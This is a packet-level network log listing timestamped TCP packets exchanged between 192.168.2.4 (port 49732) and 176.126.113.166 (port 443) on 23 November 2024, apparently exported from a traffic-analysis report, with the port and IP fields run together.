                                                                                                                      Nov 23, 2024 02:37:44.021409988 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.022072077 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:44.022078991 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.022125006 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:44.026046038 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.026065111 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.027441025 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:44.027446985 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.027502060 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:44.029808998 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.029823065 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.029891014 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:44.029896975 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.029942036 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:44.193193913 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.193214893 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.193361044 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:44.193386078 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.193439960 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:44.196934938 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.196952105 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.197026014 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:44.197033882 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.197077990 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:44.201550007 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.201564074 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.201632023 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:44.201638937 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.201682091 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:44.205378056 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.205390930 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.205457926 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:44.205463886 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.205527067 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:44.210006952 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.210021019 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.210092068 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:44.210098982 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.210139990 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:44.213535070 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.213550091 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.213618040 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:44.213624001 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.213665009 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:44.218192101 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.218205929 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.218271971 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:44.218278885 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.218322992 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:44.221952915 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.221967936 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.222035885 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:44.222043991 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.222084999 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:44.385299921 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.385320902 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.385446072 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:44.385454893 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.385510921 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:44.389091015 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.389106989 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.389195919 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:44.389204025 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.389245033 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:44.393690109 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.393727064 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.393815041 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:44.393821955 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.393882990 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:44.397530079 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.397547960 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.397614956 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:44.397622108 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.397663116 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:44.402167082 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.402180910 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.402245998 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:44.402252913 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.402296066 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:44.405657053 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.405670881 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.405740976 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:44.405746937 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.405787945 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:44.410337925 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.410356998 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.410415888 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:44.410423040 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.410469055 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:44.414088964 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.414102077 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.414166927 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:44.414174080 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.414217949 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:44.579224110 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.579253912 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.579318047 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:44.579330921 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.579359055 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:44.579380035 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:44.581476927 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.581512928 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.581571102 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:44.581578970 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.581623077 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:44.585777044 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.585805893 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.585841894 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:44.585850954 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.585882902 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:44.585906982 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:44.589579105 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.589605093 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.589657068 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:44.589664936 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.589725971 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:44.594201088 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.594222069 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.594296932 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:44.594304085 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:44.594329119 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:45.541403055 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:45.541409969 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.541455984 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:45.545972109 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.546001911 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.546084881 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:45.546091080 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.546123981 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:45.546149015 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:45.549742937 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.549771070 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.549840927 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:45.549848080 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.549887896 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:45.554423094 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.554445028 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.554487944 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:45.554495096 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.554516077 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:45.554555893 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:45.558855057 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.558876038 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.558954954 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:45.558962107 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.559006929 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:45.562683105 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.562705040 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.562773943 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:45.562779903 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.562823057 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:45.566356897 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.566390991 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.566481113 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:45.566488028 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.566535950 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:45.729732037 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.729772091 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.729841948 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:45.729851007 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.729911089 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:45.734385014 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.734406948 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.734491110 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:45.734498024 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.734549046 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:45.738151073 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.738171101 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.738219976 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:45.738225937 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.738260031 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:45.738281965 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:45.741938114 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.741957903 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.742019892 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:45.742026091 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.742074966 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:45.746618986 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.746638060 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.746680021 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:45.746685982 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.746721029 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:45.746743917 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:45.750972033 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.750993967 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.751049042 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:45.751055956 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.751099110 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:45.754740000 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.754760027 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.754805088 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:45.754811049 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.754838943 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:45.754864931 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:45.759391069 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.759411097 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.759474993 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:45.759480953 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.759535074 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:45.922224998 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.922250032 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.922368050 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:45.922377110 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.922425985 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:45.926027060 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.926045895 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.926116943 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:45.926124096 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.926168919 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:45.930644989 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.930666924 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.930754900 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:45.930754900 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:45.930762053 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.930821896 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:45.934434891 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.934456110 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.934542894 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:45.934550047 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.934592962 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:45.939105034 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.939125061 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.939189911 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:45.939197063 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.939239025 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:45.942595959 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.942615986 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.942663908 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:45.942670107 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.942707062 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:45.942725897 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:45.947279930 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.947299004 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.947355986 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:45.947362900 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.947410107 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:45.951010942 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.951030970 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.951118946 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:45.951126099 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:45.951159954 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:46.114346027 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:46.114367008 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:46.114474058 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:46.114495039 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:46.114542007 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:46.118136883 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:46.118154049 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:46.118212938 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:46.118220091 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:46.118266106 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:46.122797012 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:46.122817039 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:46.122881889 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:46.122889042 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:46.122929096 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:46.126597881 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:46.126619101 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:46.126687050 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:46.126693964 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:46.126738071 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:46.131232023 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:46.131252050 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:46.131335974 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:46.131342888 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:46.131392002 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:46.134713888 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:46.134741068 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:46.134788036 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:46.134794950 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:47.083780050 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:47.083800077 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:47.083863974 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:47.083870888 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:47.083914042 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:47.088432074 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:47.088452101 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:47.088516951 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:47.088522911 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:47.088566065 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:47.092221022 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:47.092241049 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:47.092302084 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:47.092308998 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:47.092350006 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:47.096604109 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:47.096623898 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:47.096683979 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:47.096689939 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:47.096730947 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:47.101254940 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:47.101273060 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:47.101320982 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:47.101327896 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:47.101360083 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:47.101385117 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:47.105057001 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:47.105076075 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:47.105133057 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:47.105139971 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:47.105184078 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:47.268197060 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:47.268224001 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:47.268335104 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:47.268343925 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:47.268383980 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:47.271934032 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:47.271955013 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:47.272062063 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:47.272068977 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:47.272114992 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:47.276566982 CET44349732176.126.113.166192.168.2.4
